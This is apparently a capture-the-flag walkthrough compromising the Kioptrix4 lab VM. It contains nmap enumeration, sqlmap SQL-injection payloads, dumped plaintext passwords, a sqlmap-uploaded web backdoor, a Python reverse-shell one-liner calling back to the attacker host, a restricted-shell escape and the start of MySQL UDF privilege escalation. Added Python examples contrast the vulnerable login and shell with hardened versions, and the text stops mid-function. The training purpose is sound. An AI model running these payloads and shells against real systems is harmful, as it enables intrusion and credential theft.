┌──(kali㉿kali)-[~/Downloads/Kioptrix4]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:47 EDT
Nmap scan report for 192.1.1.135
Host is up (0.0016s latency).
Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D5:52:BC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.66 seconds
┌──(kali㉿kali)-[~/Downloads/Kioptrix4]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.1.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:49 EDT
Nmap scan report for 192.1.1.135
Host is up (0.00039s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:52:BC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.43 seconds
┌──(kali㉿kali)-[~/Downloads/Kioptrix4]
└─$ sudo nmap --script=vuln -p22,80,139,445 192.1.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:51 EDT
Nmap scan report for 192.1.1.135
Host is up (0.00028s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D5:52:BC (VMware)
┌──(kali㉿kali)-[~/Downloads/Kioptrix4]
└─$ sudo smbmap -H 192.1.1.135
[sudo] password for kali:
[+] IP: 192.1.1.135:445    Name: 192.1.1.135
        Disk          Permissions    Comment
        ----          -----------    -------
        print$        NO ACCESS      Printer Drivers
        IPC$          NO ACCESS      IPC Service (Kioptrix4 server (Samba, Ubuntu))
┌──(kali㉿kali)-[~/Downloads/Kioptrix4]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.1.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:53 EDT
Nmap scan report for 192.1.1.135
Host is up (0.00014s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D5:52:BC (VMware)

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.1.1.135\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.1.1.135\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users:
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:26:55 /2023-07-15/
[10:26:55] [INFO] parsing HTTP request from 'login'
[10:26:56] [INFO] testing connection to the target URL
[10:26:56] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:26:56] [INFO] testing if the target URL content is stable
[10:26:56] [INFO] target URL content is stable
[10:26:56] [INFO] testing if POST parameter 'myusername' is dynamic
[10:26:56] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[10:26:56] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[10:26:56] [INFO] testing for SQL injection on POST parameter 'myusername'
[10:26:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:26:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:26:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:27:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:27:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:27:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:27:06] [INFO] testing 'Generic inline queries'
[10:27:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:27:06] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:27:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:27:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:27:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:27:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:27:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:27:07] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[10:27:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:27:09] [WARNING] POST parameter 'myusername' does not seem to be injectable
[10:27:09] [INFO] testing if POST parameter 'mypassword' is dynamic
[10:27:09] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[10:27:09] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[10:27:09] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[10:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:27:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:27:12] [INFO] testing 'Generic inline queries'
[10:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:27:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.1.1.135/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[10:27:15] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
……………………………………
[10:27:25] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:27:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:27:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:27:25] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[10:27:25] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[10:27:25] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[10:27:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[10:27:30] [WARNING] POST parameter 'Submit' does not appear to be dynamic
[10:27:30] [WARNING] heuristic (basic) test shows that POST parameter 'Submit' might not be injectable
………………………………………………
[10:27:41] [WARNING] POST parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3377 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login
---
[10:27:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, PHP, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[10:27:41] [INFO] fetching current database
[10:27:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:27:41] [INFO] retrieved: members
current database: 'members'
[10:27:41] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.1.1.135'
[*] starting @ 10:28:44 /2023-07-15/
[10:28:44] [INFO] parsing HTTP request from 'login'
[10:28:44] [CRITICAL] all testable parameters you provided are not present within the given request data
[*] starting @ 10:28:51 /2023-07-15/
[10:28:51] [INFO] parsing HTTP request from 'login'
[10:28:51] [INFO] resuming back-end DBMS 'mysql'
[10:28:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login
---
[10:28:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[10:28:51] [INFO] fetching tables for database: 'members'
[10:28:51] [INFO] fetching number of tables for database 'members'
[10:28:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:28:51] [INFO] retrieved: got a 302 redirect to 'http://192.1.1.135/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
1
[10:28:57] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+

[10:28:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.1.1.135'
[*] starting @ 10:29:16 /2023-07-15/
[10:29:16] [INFO] parsing HTTP request from 'login'
[10:29:16] [INFO] resuming back-end DBMS 'mysql'
[10:29:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login
---
[10:29:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[10:29:16] [INFO] fetching columns for table 'members' in database 'members'
[10:29:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:29:16] [INFO] retrieved: got a 302 redirect to 'http://192.1.1.135/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
3
[10:29:18] [INFO] retrieved: id
[10:29:18] [INFO] retrieved: username
[10:29:19] [INFO] retrieved: password
[10:29:19] [INFO] fetching entries for table 'members' in database 'members'
[10:29:19] [INFO] fetching number of entries for table 'members' in database 'members'
[10:29:19] [INFO] retrieved: 2
[10:29:19] [INFO] retrieved: MyNameIsJohn
[10:29:20] [INFO] retrieved: 1
[10:29:20] [INFO] retrieved: john
[10:29:20] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[10:29:21] [INFO] retrieved: 2
[10:29:21] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[10:29:21] [INFO] table 'members.members' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.1.1.135/dump/members/members.csv'
[10:29:21] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.1.1.135'
[*] starting @ 10:30:50 /2023-07-15/
[10:30:50] [INFO] parsing HTTP request from 'login'
[10:30:50] [INFO] resuming back-end DBMS 'mysql'
[10:30:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login
---
[10:30:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[10:30:50] [INFO] going to use a web backdoor for command prompt
[10:30:50] [INFO] fingerprinting the back-end DBMS operating system
[10:30:50] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

[10:31:01] [INFO] retrieved the web server document root: '/var/www'
[10:31:01] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[10:31:01] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[10:31:01] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.1.1.135:80/tmpupkhq.php
[10:31:01] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[10:31:01] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[10:31:04] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.1.1.135:80/tmpbhprh.php
[10:31:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'www-data'
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> which python
do you want to retrieve the command standard output? [Y/n/a]
command standard output: '/usr/bin/python'
os-shell> python --version
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'Python 2.5.2'
os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.1.1.128",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
do you want to retrieve the command standard output? [Y/n/a]
No output
www-data@Kioptrix4:/var/www$ cat checklogin.php
cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>
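The source above explains both sqlmap findings: `$myusername` goes through `mysql_real_escape_string()`, but the two lines that would do the same for `$mypassword` are commented out, and any non-zero row count is treated as a successful login, so a tautology in the password field logs in as whichever user is named. The block below is an added example, not the page's code and not checklogin.php itself: it rebuilds the `members` table in an in-memory SQLite database seeded with the two rows sqlmap dumped, reproduces the concatenated query beside a parameterised one, and models the one-sided escaping. SQLite has no MySQL-style `#` comment and does not treat backslashes as escapes, so the tautology uses `--` and `escape_username` doubles quotes; the names `make_db`, `escape_username`, `vulnerable_login` and `safe_login` are this example's own.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the 'members' database, seeded with the two rows
    sqlmap dumped on this page (constructed test fixture)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")],
    )
    return con


def escape_username(s):
    """checklogin.php escapes only $myusername (mysql_real_escape_string).
    SQLite's equivalent is quote doubling; this keeps the one-sided escaping
    of the original without pretending to be the MySQL function."""
    return s.replace("'", "''")


def vulnerable_login(con, username, password):
    """Same shape as checklogin.php: the password is spliced into the SQL text
    unescaped, and 'if($count!=0)' becomes 'rows != 0'."""
    sql = "SELECT * FROM members WHERE username='%s' and password='%s'" % (
        escape_username(username), password)
    rows = con.execute(sql).fetchall()
    return len(rows) != 0


def safe_login(con, username, password):
    """Parameterised query: both inputs are bound as data, never parsed as SQL,
    so a quote in the password cannot change the WHERE clause."""
    rows = con.execute(
        "SELECT * FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) != 0


if __name__ == "__main__":
    con = make_db()
    # Same idea as sqlmap's boolean-based finding, with '--' in place of '#'.
    tautology = "x' OR 7958=7958--"
    print("vulnerable, real password :", vulnerable_login(con, "john", "MyNameIsJohn"))
    print("vulnerable, tautology     :", vulnerable_login(con, "john", tautology))
    print("vulnerable, quote in user :", vulnerable_login(con, "' OR 1=1--", "x"))
    print("safe, tautology           :", safe_login(con, "john", tautology))
    print("safe, real password       :", safe_login(con, "john", "MyNameIsJohn"))
```

Run it and the third line shows why sqlmap reported `myusername` as not injectable while `mypassword` was: the escaped username becomes a harmless literal, whereas the password turns the WHERE clause into `(username='john' AND password='x') OR 7958=7958`, which matches every row.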
We now have the database credentials (root with an empty password). Together with the passwords recovered through the SQL injection, we can try logging in over ssh or switching users with su; first, a look at /etc/passwd.
www-data@Kioptrix4:/home$ su john
su john
Password: MyNameIsJohn

== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ su robert
su robert
*** unknown command: su
john:~$ exit
exit
www-data@Kioptrix4:/home$ su robert
su robert
Password: ADGAdsafdfwt4gadfga==

== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ id
id
*** unknown command: id
robert:~$ whoami
whoami
It is a restricted shell. So go back to the www-data user, do some basic information gathering, and then look again.
www-data@Kioptrix4:/home/john$ cat .lhistory
cat .lhistory
?
help
echo os.system('/bin/bash')
exit
su
sudo
?
scp
touch
hello
help
ls /root
exit
echo os.system('/bin/bash')
exit
su robert
exit
┌──(kali㉿kali)-[~/Downloads/Kioptrix4]
└─$ ssh john@192.1.1.135 -oHostKeyAlgorithms=ssh-rsa
The authenticity of host '192.1.1.135 (192.1.1.135)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.135' (RSA) to the list of known hosts.
john@192.1.1.135's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ whoami
john
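The restricted shell above rejects `su` and `id` by name but lets `echo os.system('/bin/bash')` through, which is the usual failure of a restricted shell that checks only the first word of the line: the allow-list is enforced, yet the arguments end up in front of an interpreter instead of being treated as data. The block below is a constructed model of that bug class next to a hardened dispatcher; it is an added example, not lshell's or the LigGoat shell's source, and the only thing taken from the page is the allow-list printed by `?`. The names `vulnerable_dispatch`, `hardened_dispatch`, `ALLOWED` and `BUILTINS` are this example's own, and the vulnerable variant deliberately uses `eval()` to reproduce the symptom; how the real shell reaches the same result is not something the page shows.

```python
import os
import shlex
import subprocess

# Allow-list copied from the '?' output of the restricted shell on this page.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "ll", "lpath", "ls"}
# Commands the shell would implement itself; modelled as no-ops here (assumption).
BUILTINS = {"cd", "clear", "exit", "help", "lpath"}


def vulnerable_dispatch(line):
    """Model of the bug class (hypothetical, not the real shell's code): only the
    command word is compared with the allow-list, and the rest of an 'echo' line
    is handed to the interpreter's eval() with the os module reachable. That is
    exactly the property 'echo os.system(...)' needs to escape."""
    cmd, _, rest = line.strip().partition(" ")
    if cmd not in ALLOWED:
        return "*** unknown command: " + cmd
    if cmd in BUILTINS:
        return ""
    if cmd == "echo":
        try:
            return str(eval(rest, {"os": os}))  # user-supplied text executed as Python
        except Exception:
            return rest                          # plain words are merely echoed back
    return subprocess.run(shlex.split(line), capture_output=True,
                          text=True, check=False).stdout.rstrip("\n")


def hardened_dispatch(line):
    """Arguments are data: tokenise with shlex, check the command word against the
    allow-list, then execute an argv list with shell=False. No shell and no
    evaluator ever sees the user's text, so 'echo os.system(...)' prints a string."""
    argv = shlex.split(line)
    if not argv or argv[0] not in ALLOWED:
        return "*** unknown command: " + (argv[0] if argv else "")
    if argv[0] in BUILTINS:
        return ""
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    for line in ("echo hello", "echo 6*7", "echo os.getpid()", "id", "su robert"):
        print("%-18s vulnerable -> %-14r hardened -> %r"
              % (line, vulnerable_dispatch(line), hardened_dispatch(line)))
```

`echo os.getpid()` is the harmless stand-in for the page's `echo os.system('/bin/bash')`: the vulnerable dispatcher returns the interpreter's own process id, the hardened one returns the literal text, and both still reject `id` and `su` with the same `*** unknown command` message the transcript shows. The lesson for anyone deploying a restricted shell is that the allow-list is necessary but not sufficient; every byte after the command word has to stay inert.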
Continue information gathering, looking for a privilege escalation foothold.
john@Kioptrix4:/$ sudo -l [sudo] password for john: Sorry, user john may not run sudo on Kioptrix4.
robert@Kioptrix4:/$ sudo -l [sudo] password for robert: Sorry, user robert may not run sudo on Kioptrix4.
www-data@Kioptrix4:/home/john$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
ps aux and netstat -ano show that MySQL is running as a root process.
john@Kioptrix4:~$ ps aux | grep mysql
ps aux | grep mysql
root      5015  0.0  0.5 130348 21380 ?        Sl   Jul15   0:07 /usr/sbin/mysql
One more detail: the two files sqlmap wrote into the web root for its os-shell are owned by root. That points at UDF privilege escalation, so log in to MySQL and check whether the precondition is met: no restriction on file import and export.
www-data@Kioptrix4:/var/www$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7639
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show global variables like '%secure_file_priv%';
show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.00 sec)

mysql> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';
ERROR 1046 (3D000): No database selected
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| members            |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use mysql
use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
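Three separate misconfigurations line up here to make the UDF route worth trying: mysqld runs as root (the `ps aux` line above), checklogin.php connects as the MySQL root account with an empty password, and `secure_file_priv` is empty, so the server may read and write files anywhere its process can. A defender wants each of these flagged on its own, because fixing any one of them breaks the chain. The block below is an added example, not code from the page or from any tool it uses: it parses the two outputs exactly as the mysql client and `ps` print them and returns one finding per precondition. The `ps` header and the apache2 line are constructed so the parser sees a realistic listing; the `/usr/sbin/mysql` line and the `secure_file_priv` table are copied from the page, and the names `parse_ps`, `parse_show_variables` and `audit` are this example's own.

```python
import re

# Constructed sample input: the page's 'ps aux | grep mysql' line, plus a header
# and an apache2 line invented so the parser has a realistic listing to work on.
PS_AUX = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      5015  0.0  0.5 130348 21380 ?        Sl   Jul15   0:07 /usr/sbin/mysql
www-data  6201  0.0  0.3  80000 12000 ?        S    Jul15   0:00 /usr/sbin/apache2 -k start
"""

# Constructed sample input: the SHOW GLOBAL VARIABLES table as printed on the page.
SECURE_FILE_PRIV = """\
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
"""


def parse_ps(text):
    """Turn 'ps aux' output into dicts. COMMAND may itself contain spaces, so the
    line is split on at most ten whitespace gaps and the remainder kept whole."""
    procs = []
    for line in text.splitlines()[1:]:          # skip the USER/PID header
        parts = line.split(None, 10)
        if len(parts) == 11:
            procs.append({"user": parts[0], "pid": int(parts[1]), "command": parts[10]})
    return procs


def parse_show_variables(text):
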